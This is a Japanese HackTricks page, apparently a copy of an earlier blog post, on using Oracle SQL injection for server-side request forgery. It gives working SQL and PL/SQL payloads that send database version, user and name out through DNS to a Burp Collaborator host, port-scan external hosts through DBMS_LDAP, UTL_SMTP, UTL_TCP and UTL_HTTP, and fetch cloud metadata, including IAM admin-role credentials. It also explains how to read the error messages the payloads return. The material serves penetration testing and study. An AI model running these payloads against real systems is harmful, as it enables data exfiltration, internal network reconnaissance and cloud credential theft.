12 KiB
Oracleインジェクション
htARTE(HackTricks AWS Red Team Expert) を通じてゼロからヒーローまでAWSハッキングを学ぶ!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksスワッグを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
- 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦で私をフォローする:@carlospolopm。
- ハッキングトリックを共有するために、HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出してください。
この投稿には、https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/から削除された投稿のウェイバックマシンのコピーを提供します。
SSRF
Oracleを使用してOut of Band HTTPおよびDNSリクエストを行う方法は十分に文書化されていますが、インジェクションでSQLデータを外部に送信する手段としても使用できます。これらのテクニック/関数を変更して他のSSRF/XSPAを行うこともできます。
Oracleのインストールは非常に面倒であり、特にコマンドを試すために素早くインスタンスをセットアップしたい場合はそうです。Appseccoの友人で同僚であるAbhisek Dattaは、https://github.com/MaksymBilenko/docker-oracle-12cを紹介してくれました。これにより、t2.large AWS UbuntuマシンとDocker上にインスタンスをセットアップできました。
このブログ投稿の過程で、Oracleをネイティブインストールとして完全なネットワークアクセスを持つように模倣できるように、dockerコマンドを--network="host"フラグと共に実行しました。
docker run -d --network="host" quay.io/maksymbilenko/oracle-12c
URLまたはホスト名/ポート番号の指定をサポートするOracleパッケージ
ホストとポートの指定をサポートするパッケージや関数を見つけるために、Oracle Database Online DocumentationでGoogle検索を実行しました。具体的には、
site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"
検索結果は以下の通りです(すべてがアウトバウンドネットワークを実行するために使用できるわけではありません)
- DBMS_NETWORK_ACL_ADMIN
- UTL_SMTP
- DBMS_XDB
- DBMS_SCHEDULER
- DBMS_XDB_CONFIG
- DBMS_AQ
- UTL_MAIL
- DBMS_AQELM
- DBMS_NETWORK_ACL_UTILITY
- DBMS_MGD_ID_UTL
- UTL_TCP
- DBMS_MGWADM
- DBMS_STREAMS_ADM
- UTL_HTTP
この簡単な検索では、ホスト名とポート番号を渡すことができるDBMS_LDAPのようなパッケージがスキップされています。ドキュメントページは、単に異なる場所を指すだけです。したがって、見落としたかもしれないアウトバウンドリクエストを行うために悪用できる他のOracleパッケージがあるかもしれません。
いずれにせよ、発見しリストアップしたいくつかのパッケージを見てみましょう。
DBMS_LDAP.INIT
DBMS_LDAPパッケージは、LDAPサーバーからデータにアクセスすることを可能にします。init()関数は、LDAPサーバーとのセッションを初期化し、ホスト名とポート番号を引数として取ります。
この関数は以前に、以下のようにDNS経由でのデータの外部への送信を示すために文書化されています。
SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
しかし、関数がホスト名とポート番号を引数として受け入れるため、これをポートスキャナーのように使用することができます。
以下にいくつかの例を示します。
SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.は、ポートが閉じていることを示していますが、セッション値はポートが開いていることを指しています。
UTL_SMTP
UTL_SMTPパッケージは、SMTP経由でメールを送信するために設計されています。Oracleのドキュメントサイトに提供されている例では、このパッケージを使用してメールを送信する方法が示されています。しかし、私たちにとって興味深いのは、ホストとポートの指定ができる点です。
以下に、タイムアウトを2秒に設定したUTL_SMTP.OPEN_CONNECTION関数の簡単な例が示されています。
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
END;
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
END;
ORA-29276: 転送タイムアウト はポートが開いていることを示しますが、SMTP接続が確立されていません。一方、ORA-29278: SMTP一時エラー: 421 サービスが利用できません はポートが閉じていることを示します。
UTL_TCP
UTL_TCP パッケージとその手続きおよび関数はTCP/IPベースのサービスとの通信を可能にします。特定のサービス向けにプログラムされている場合、このパッケージはネットワークへの入り口となるか、TCP/IP接続のすべての側面を制御できるため、完全なサーバーサイドリクエストを実行できます。
Oracleのドキュメントサイトの例では、このパッケージを使用してウェブページを取得するために生のTCP接続を行う方法を示しています。これをさらに簡略化して、メタデータインスタンスや任意のTCP/IPサービスにリクエストを行うために使用できます。
set serveroutput on size 30000;
SET SERVEROUTPUT ON
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
/
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
興味深いことに、生のTCPリクエストを作成できる能力のため、このパッケージはすべてのクラウドプロバイダーのインスタンスメタデータサービスをクエリするためにも使用できます。メソッドタイプや追加ヘッダーなどはすべてTCPリクエスト内で渡すことができます。
UTL_HTTPとWebリクエスト
おそらく、あらゆるOut of Band Oracle SQL Injectionチュートリアルで最も一般的で広く文書化されているテクニックは、UTL_HTTPパッケージです。このパッケージは、ドキュメントによって次のように定義されています - UTL_HTTPパッケージはSQLおよびPL/SQLからハイパーテキスト転送プロトコル(HTTP)の呼び出しを行います。これを使用して、HTTP経由でインターネット上のデータにアクセスできます。
select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
追加で、次のようなクエリを使用して、基本的なポートスキャンも実行できます。
select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
ORA-12541: TNS:no listenerまたはTNS:operation timed outは、TCPポートが閉じていることを示し、ORA-29263: HTTP protocol errorまたはデータはポートが開いていることを示します。
過去にさまざまな成功を収めた別のパッケージは、HTTPURITYPE Oracle抽象型のGETCLOB()メソッドです。このメソッドを使用すると、URLとやり取りし、HTTPプロトコルをサポートすることができます。GETCLOB()メソッドは、URLからGET応答をCLOBデータ型として取得するために使用されます。[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
ゼロからヒーローまでのAWSハッキングを学ぶ htARTE (HackTricks AWS Red Team Expert)!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksグッズを入手してください
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見つけてください
- 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmでフォローしてください。
- HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。